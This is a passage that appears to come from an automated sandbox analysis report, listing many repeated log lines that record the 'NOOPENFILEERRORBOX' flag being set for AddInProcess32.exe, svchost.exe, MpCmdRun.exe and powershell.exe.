                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
